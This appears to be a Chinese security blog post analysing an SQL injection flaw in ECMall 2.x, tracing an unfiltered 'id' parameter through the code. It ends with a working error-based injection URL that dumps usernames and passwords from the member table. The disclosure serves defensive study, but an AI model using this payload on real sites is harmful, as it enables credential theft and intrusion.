代码审计:ecmall 2.x通杀SQL注入漏洞分析及利用

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

漏洞文件app/buyer_groupbuy.app.php

  

function exit_group() 
    { 
        $id = empty($_GET['id']) ? 0 : $_GET['id']; //没过滤你懂的。 
        if (!$id) 
        { 
            $this->show_warning('no_such_groupbuy'); 
            return false; 
        } 
  
        // 判断是否能退团 
        if (!$this->_ican($id, ACT)) //跟进 
        { 
            $this->show_warning('Hacking Attempt'); 
            return; 
        } 
...... 
    } 
function _ican($id, $act = '') 
    { 
...... 
        $group = current($this->_member_mod->getRelatedData('join_groupbuy', $this->visitor->info['user_id'], array( 
                'conditions' => 'gb.group_id=' . $id, //带入 
                'order' => 'gb.group_id DESC', 
                'fields' => 'gb.state,groupbuy_log.order_id'
        ))); 
...... 
    } 
  
eccore/model/mode.base.php 
  
  
function getRelatedData($relation_name, $ids, $find_param = array()) 
    { 
...... 
        /* 构造查询条件 */
        $conditions = $alias . '.' . $relation_info['foreign_key'] . ' ' . db_create_in($ids);   //主键值限定 
        $conditions .= $relation_info['ext_limit'] ? 
                            ' AND ' . $this->_getExtLimit($relation_info['ext_limit'], $alias) 
                            : ''; 
        $conditions .= is_string($find_param['conditions']) ? ' AND ' . $find_param['conditions'] : ''; 
        $find_param['conditions'] = $conditions; //带入 
...... 
 return $model->find($find_param);//跟进 
    } 
    function find($params = array()) 
    { 
        extract($this->_initFindParams($params)); 
  
        /* 字段(SELECT FROM) */
        $fields = $this->getRealFields($fields); 
        $fields == '' && $fields = '*'; 
  
        $tables = $this->table . ' ' . $this->alias; 
  
        /* 左联结(LEFT JOIN) */
        $join_result = $this->_joinModel($tables, $join); 
  
        /* 原来为($join_result || $index_key),忘了最初的用意,默认加上主键应该是只为了为获得索引的数组服务的,因此只跟索引键是否是主键有关 */
        if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key))) 
        { 
            /* 如果索引键里有主键,则默认在要查询字段后加上主键 */
            $fields .= ",{$this->alias}.{$this->prikey}"; 
        } 
  
        /* 条件(WHERE) */
        $conditions = $this->_getConditions($conditions, true); 
  
        /* 排序(ORDER BY) */
        $order && $order = ' ORDER BY ' . $this->getRealFields($order); 
  
        /* 分页(LIMIT) */
        $limit && $limit = ' LIMIT ' . $limit; 
        if ($count) 
        { 
            $this->_updateLastQueryCount("SELECT COUNT(*) as c FROM {$tables}{$conditions}"); 
        } 
  
        /* 完整的SQL */
        $sql = "SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}"; 
  
        return $index_key ? $this->db->getAllWithIndex($sql, $index_key) : 
                            $this->db->getAll($sql); 
//带入查询,结束. 
    }

 

利用方法:http://localhost/ecmall/index.php?app=buyer_groupbuy&act=exit_group&id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b

 

作者:Chora

Tags:

ecmall漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
代码审计:ecmall 2.x通杀SQL注入漏洞分析及利用